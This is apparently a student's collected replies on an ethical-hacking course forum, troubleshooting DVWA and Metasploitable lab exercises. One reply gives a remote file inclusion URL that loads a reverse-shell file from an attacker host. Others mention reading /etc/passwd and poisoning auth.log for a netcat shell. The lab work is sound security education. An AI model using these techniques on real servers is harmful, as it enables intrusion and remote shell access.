Forum Replies Created
- Posts
That didn’t work, so I got to thinking about the php file. Since it had an extension of .txt, it probably couldn’t be executed without adding execution permissions. I did that and now it works. Thanks,
Tom
Vashisht,
This is the exact URL I used – http://10.0.2.7/dvwa/vulnerabilities/fi/?page=http:/10.0.2.6/reverse.txt
kali machine is on 10.0.2.6, with apach2 server started. dvwa is on 10.0.2.7. reverse.txt file is in /var/www/html directory. Dvwa set to “low” security. Thanks in advance for your help. Have not had any luck finding the solution searching the web.
Thanks, that worked, but I probably won’t be able to change permissions on a target server like that. I’ll try to come back to this later and see if I can get it to work another way. By the way, you put on good courses – easy to follow and understandable.
I can open the etc/passwd file. I can open other files in the log directory, but can’t open any “syslog” files, like “auth.log”, “auth.log.0” or “debug”. DVWA is set to “low’, I confirmed that. It appears to be a permission or environment problem, but this would mean Metasploitable would not work for any other user for this test if this was the case. I haven’t changed any files in Metasploitable.
Thanks for the prompt reply, Zaid. So I took your above suggestions, and now get a slightly different error relating to permissions? A screen shot is attached at https://ibb.co/hCSGvMG.
Tom
Right, I get the message:ERROR: File not found! from the web server. However, when I navigate to the auth.log file in metasploitable, the auth.log file is there and shows the unsuccessful attempt by [email protected] to log in. It’s puzzling, because the same commands allowed me to see the auth.log file the first time I tried this in the web site. Then, my problem was netcat not making the connection. I’m regressing. I posted the latest images at https://ibb.co/xYSRb4g, called “8.3 random login results.”
Please see attached screen shots. Today I can’t seem to load the auth.log file in dvwa. I could the other day. the screen shots are in one file at https://ibb.co/D72XLQL. NOTE: in the lecture, the log file is at var/auth/auth.log. On my metaspoitable vm, it’s at /var/log/auth.log
Vashisht, not sure what you mean by that. The two files I uploaded are called “8.3 – passthru command” and “8.3 netcat command before encoding with Burpsuite base64 – nc running”. Is that what you need?
Tom
Vashisht, I posted two screen shots to https://imgbb.com/.
Tom
Thanks for the prompt reply, Zaid. I tried the 64 bit link again, but got the same results – an error message “Sorry, you can’t view or download this file at this time. Too many users have viewed or downloaded this file recently”. Is there an alternate link or site? I don’t do Torrent, is the file located there as well? Thanks,
Tom
